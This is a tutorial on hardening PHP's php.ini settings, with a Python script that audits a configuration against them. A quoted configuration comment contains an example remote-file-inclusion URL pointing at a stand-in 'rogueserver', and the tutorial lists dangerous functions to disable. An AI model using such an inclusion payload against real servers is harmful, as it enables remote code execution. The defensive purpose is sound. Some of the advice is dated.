Introduction
PHP is a widely-used, general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. The code is interpreted by a Web server with a PHP processor module that generates the resulting Web page. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications. PHP can be deployed on most Web servers and also as a standalone shell on almost every operating system and platform, free of charge.
Secure PHP Configuration
In this tutorial you will see the principles of securing your PHP configuration file. Many PHP scripts are badly coded and can be abused by malicious users, but there are some basic things you can do at the configuration level to make PHP more secure.
(Note: For the purpose of this tutorial BackBox (Based on Ubuntu) as OS and the latest installation of PHP will be used. There are no guarantees or absolutes for PHP security things, so proceed at your own risk.)
First, locate the directory in which the PHP configuration file is located by typing the following command:
sudo locate php.ini
By default the php.ini file is located at /etc/php5/apache2/php.ini, but running the command above shows exactly where it is on your system.
root@liatsisfotis:~# locate php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini.save
(Note: This directory may differ from yours, depending on whether you changed the destination folder during the installation process and on the OS that is used.)
The php.ini file can be opened using an editor; in this case, GNU nano:
sudo nano /etc/php5/apache2/php.ini
Messaging and Logging
By default PHP prints error messages to the browser output, disclosing sensitive information such as the installation path, PHP version or usernames. Disable that and send errors to the log instead by modifying the following settings:
display_errors = Off
log_errors = On
error_log = syslog
ignore_repeated_errors = On
Disallow Harmful Functions
Disable functions that allow scripts to execute operating-system commands or disclose configuration details. To disable functions, add their names, comma-separated, to the disable_functions option:
disable_functions = dl, phpinfo, system
Time Limits
Limits can be put on PHP's execution time, memory usage, POST data and file uploads by changing the following options (php.ini comments start with a semicolon):
; Maximum execution time of each script, in seconds
max_execution_time = 30
; Maximum amount of time each script may spend parsing request data
max_input_time = 60
; Maximum amount of memory a script may consume (8MB)
memory_limit = 8M
; Maximum size of POST data that PHP will accept.
post_max_size = 8M
; Whether to allow HTTP file uploads.
file_uploads = Off
; Maximum allowed size for uploaded files.
upload_max_filesize = 2M
Disable Remote Files
PHP allows files to be opened remotely by simple scripts that use the fopen function. If a script opens a file whose name is controllable by a remote user, two things can happen:
Any file on the local system which the webserver can read can be viewed by the remote attacker.
Arbitrary commands can be executed upon your server if the user can cause a remote PHP file to be opened.
To prevent this, set the following in your php.ini file:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; This is turned off to avoid variable redefinition by a remote attacker
; who attempts to have the server download (and execute) a remote file
; from a compromised host. This behaviour has been observed in automatic
; scanning against badly written applications:
; http://myhost/myapplication.php?include=http://rogueserver/rogueapp.php
; Disable remote URLs for file handling functions
allow_url_fopen = Off
Register Globals
PHP version 5.3.5 still supports providing request input values as global variables. This option is responsible for many security issues if the code is not very well thought out, so you should do your best to write your scripts so that they do not require register_globals to be on.
register_globals = Off
Read – Write Permissions
PHP can limit what fopen and other file access functions are allowed to read and write to a defined directory tree. This directive makes most sense when used in a per-directory or per-virtualhost web server configuration, and it is not affected by whether Safe Mode is turned On or Off.
open_basedir = /var/www/files/docs
Safe Mode
PHP Safe Mode is a security feature that was designed to prevent malicious users from being able to use PHP scripts to execute commands at the operating system level. It was intended to be a security method for web applications running on shared hosting accounts, as virtual private servers (VPS) and dedicated servers running single web hosting accounts did not need it. It never functioned well, however, and PHP developers have removed it from the upcoming version 6 release. The primary problem is that some basic functions required by web scripts would simply not work with PHP safe mode enabled.
safe_mode = Off
Because Safe Mode disables file access, access to environment variables and execution of binary programs that are not owned by Apache, the option safe_mode_gid can be changed from Off to On so that PHP is able to open files that belong to Apache's group regardless of the owner.
safe_mode_gid = On
In Safe Mode, the user may only alter environment variables whose names begin with the prefixes supplied here. By default, users will only be able to set environment variables that begin with PHP_ (e.g. PHP_FOO).
safe_mode_allowed_env_vars = PHP_
Also, when Safe Mode is enabled, only executables located in safe_mode_exec_dir may be executed via the exec family of functions.
safe_mode_exec_dir = /var/www/executables
Hiding PHP Information
PHP may expose the fact that it is installed on the server by showing the PHP version, installation paths or adding its signature to the web server's response headers. We can disable this by modifying the following option:
expose_php = Off
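Before applying these settings to a live server, it helps to check a php.ini file against them automatically. The following Python script is an added example, not part of the original tutorial; it reads a php.ini-style file with a small parser, checks the directives discussed in the Messaging and Logging, Disallow Harmful Functions, Time Limits, Disable Remote Files, Register Globals and Hiding PHP Information sections above, and also verifies the size ordering PHP expects (upload_max_filesize within post_max_size, post_max_size within memory_limit). The two embedded php.ini fragments are constructed samples, and the baseline set of disabled functions is assumed from the disable_functions line above.

```python
import re

# Constructed sample php.ini fragments (not taken from a real server).
# The first matches the hardening guidance in this tutorial, the second
# is a deliberately insecure configuration used for comparison.
SECURE_INI = """
[PHP]
display_errors = Off
log_errors = On
error_log = syslog
ignore_repeated_errors = On
disable_functions = dl, phpinfo, system
max_execution_time = 30
max_input_time = 60
memory_limit = 8M
post_max_size = 8M
file_uploads = Off
upload_max_filesize = 2M
allow_url_fopen = Off
register_globals = Off
expose_php = Off
"""

INSECURE_INI = """
[PHP]
; comments and blank lines are ignored by the parser
display_errors = On
log_errors = Off
disable_functions =
memory_limit = 8M
post_max_size = 16M
upload_max_filesize = 32M
allow_url_fopen = On
register_globals = On
expose_php = On
"""

def parse_ini(text):
    """Minimal php.ini reader: returns {directive: value}, ignoring section
    headers, blank lines and ';' comments. Surrounding quotes are stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('[') or '=' not in line:
            continue
        key, value = line.split('=', 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def is_off(value):
    """PHP treats Off, 0, no, false, none and the empty string as false."""
    return value.strip().lower() in ('', '0', 'off', 'no', 'false', 'none')

def to_bytes(value):
    """Convert a PHP shorthand size (8M, 2G, 512K, 1024) to bytes."""
    m = re.fullmatch(r'\s*(\d+)\s*([kmgKMG]?)\s*', value)
    if not m:
        raise ValueError(f'not a PHP size value: {value!r}')
    num, unit = int(m.group(1)), m.group(2).lower()
    return num * {'': 1, 'k': 1024, 'm': 1024 ** 2, 'g': 1024 ** 3}[unit]

# Directives the tutorial says must be Off, and those it says must be On.
MUST_BE_OFF = ('display_errors', 'allow_url_fopen', 'register_globals', 'expose_php')
MUST_BE_ON = ('log_errors', 'ignore_repeated_errors')
# Assumed minimum set, taken from the disable_functions line above.
BASELINE_DISABLED = {'dl', 'phpinfo', 'system'}

def audit(text):
    """Return a list of findings; an empty list means the file follows the
    hardening guidance. Directives that are absent are reported as well,
    because PHP's built-in default is usually the insecure value."""
    cfg = parse_ini(text)
    findings = []
    for key in MUST_BE_OFF:
        if key not in cfg:
            findings.append(f'{key} is not set explicitly')
        elif not is_off(cfg[key]):
            findings.append(f'{key} should be Off, found {cfg[key]!r}')
    for key in MUST_BE_ON:
        if key not in cfg:
            findings.append(f'{key} is not set explicitly')
        elif is_off(cfg[key]):
            findings.append(f'{key} should be On, found {cfg[key]!r}')
    disabled = {f.strip() for f in cfg.get('disable_functions', '').split(',') if f.strip()}
    missing = sorted(BASELINE_DISABLED - disabled)
    if missing:
        findings.append('disable_functions is missing: ' + ', '.join(missing))
    # Size ordering: an upload must fit in the POST body, and the POST body
    # must fit in the script's memory limit (-1 means unlimited, skip it).
    sizes = {k: to_bytes(cfg[k]) for k in ('upload_max_filesize', 'post_max_size', 'memory_limit')
             if k in cfg and cfg[k].strip() != '-1'}
    if {'upload_max_filesize', 'post_max_size'} <= sizes.keys() and sizes['upload_max_filesize'] > sizes['post_max_size']:
        findings.append('upload_max_filesize exceeds post_max_size')
    if {'post_max_size', 'memory_limit'} <= sizes.keys() and sizes['post_max_size'] > sizes['memory_limit']:
        findings.append('post_max_size exceeds memory_limit')
    return findings

if __name__ == '__main__':
    for name, text in (('secure sample', SECURE_INI), ('insecure sample', INSECURE_INI)):
        print(f'{name}: {len(audit(text))} finding(s)')
        for finding in audit(text):
            print('  -', finding)
```

To check a real file, read it with `open('/etc/php5/apache2/php.ini').read()` and pass the text to `audit()`; the parser deliberately ignores section headers, so the single `[PHP]` section in a stock php.ini is handled the same way as the samples.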
Limit Access to Certain Files
We can allow access only to specific directories, prohibiting default access to other filesystem locations, by placing the following Apache directive in a .htaccess file or in Apache's configuration. FilesMatch requires a regular expression; replace PATTERN with an expression matching the files to protect.
<FilesMatch "PATTERN">
Order allow,deny
Deny from all
</FilesMatch>
Tip
To review the active PHP options, create a file called phpinfo.php containing the following code and open it in your browser:
<?php
phpinfo();
?>
(Note: It is recommended that this file is deleted before the web server goes online, since phpinfo() discloses the full configuration to anyone who can request it.)
Conclusion
There are many things that can be done to secure PHP. This tutorial describes the basics that make PHP more secure. The best approach is to try every parameter on a localhost web server to understand what the option does before changing the main web server's PHP configuration file.
Designed and Created by Liatsis Fotis
© 2012 Liatsis Fotis
